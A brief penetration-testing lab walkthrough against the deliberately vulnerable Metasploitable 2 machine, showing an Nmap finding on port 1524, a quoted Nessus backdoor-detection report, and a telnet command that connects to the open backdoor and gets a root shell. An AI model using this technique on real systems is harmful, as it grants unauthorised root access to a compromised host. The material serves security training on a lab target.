The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
1524/tcp open ingreslock?
Ingreslock was popular for adding a backdoor on to a compromised server.
The Nessus report had this to say on port 1524:
1524/tcp
Rogue Shell Backdoor Detection
Synopsis
The remote host may have been compromised.
Description
A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.
And so we can test the backdoor connection in the attacking Terminal:
:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#
Very simple.